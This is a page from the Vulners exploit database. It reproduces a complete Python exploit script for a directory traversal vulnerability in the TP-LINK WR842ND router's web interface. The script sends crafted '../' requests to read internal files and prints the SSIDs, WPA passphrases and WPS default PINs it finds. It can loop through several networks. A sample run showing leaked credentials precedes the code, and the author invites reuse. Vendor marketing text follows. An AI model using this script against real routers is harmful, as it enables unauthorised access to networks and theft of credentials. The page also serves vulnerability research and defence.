Vulners
Lucene search
TP-LINK WR842ND Directory Traversal
`#!/usr/bin/python
'''
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com
If remote management is on you have full access to router configuration - if not and you're connected
to router network you can discover another configured SSID's.
Successfully tested against TP-LINK WR842ND
Firmware Version: 3.12.22 Build 120424 Rel.39632n
Feel free to use, modify and distribute.
.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`--> python2 e.py ip:port
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com
:: Crafting and sending evil request..
-> ssid="some_network"
!wps_default_pin=01010101
!wpa_passphrase="secretpsk"
:: Search for another networks? (y/n)
> y
:: Searching..
:: Jumping for SSID 1..
-> ssid="another_network"
!wps_default_pin=01010101
!wpa_passphrase="another_secretpsk"
:: Jumping for SSID 2..
:: Jumping for SSID 3..
:: Jumping for SSID 4..
.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`-->
'''
import requests,sys,socket
from time import sleep
data=''
data2=''
url=''
W = '\033[0m'
R = '\033[31m'
B = '\033[34m'
#KISS
def parse_data(text):
words = text.split()
for word in words :
if 'ssid' in word and 'ignore' not in word :
print W+"-> "+B+"%s" %(word)
if 'pass' in word :
print W+" !"+R+"%s" %(word)
if 'default_pin' in word :
print W+" !"+R+"%s" %(word)
print W
def make_url(host,n):
junk = ("http://%s/help/../../../../../../../../../../../../../../../../tmp/ath%s.ap_bss") % (host,n)
return junk
if len(sys.argv) == 1 :
print "Usage: %s router_ip:port (default port=80)" %(sys.argv[0])
sys.exit()
url = make_url(sys.argv[1],0)
if ':' in sys.argv[1] :
host = sys.argv[1].split(":")
else :
host = sys.argv[1]
headers={
"Host" : host[0],
"User-Agent" : "Mozzila/5.0",
"Referer" : "http://"+host[0]+"/"
}
print "TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit"
print "Adam Simuntis :: http://unixjail.com\n"
try:
print R+":: Crafting and sending evil request.."
print W
data = requests.get(url,headers=headers).content
except requests.ConnectionError, e:
print R+":! Connection error!\n"
sys.exit()
if data :
parse_data(data)
else :
print B+":! Ups.. seems to be not vulnerable"
print W
print "\n:: Search for another networks? (y/n)"
answer = raw_input("> ")
if answer=="y" or answer=="Y" :
print R+"\n:: Searching.."
print W
for i in range(1,5) :
print W+":: Jumping for SSID %s..\n" %(i)
sleep(3)
url = make_url(sys.argv[1],i)
data2 = requests.get(url,headers=headers).content
if data2 :
parse_data(data2)
else :
print B+"-> Nothing..\n"
else :
print W+"\n:: Bye!"
print
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 May 2013 00:00Current
0.2Low risk
Vulners AI Score0.2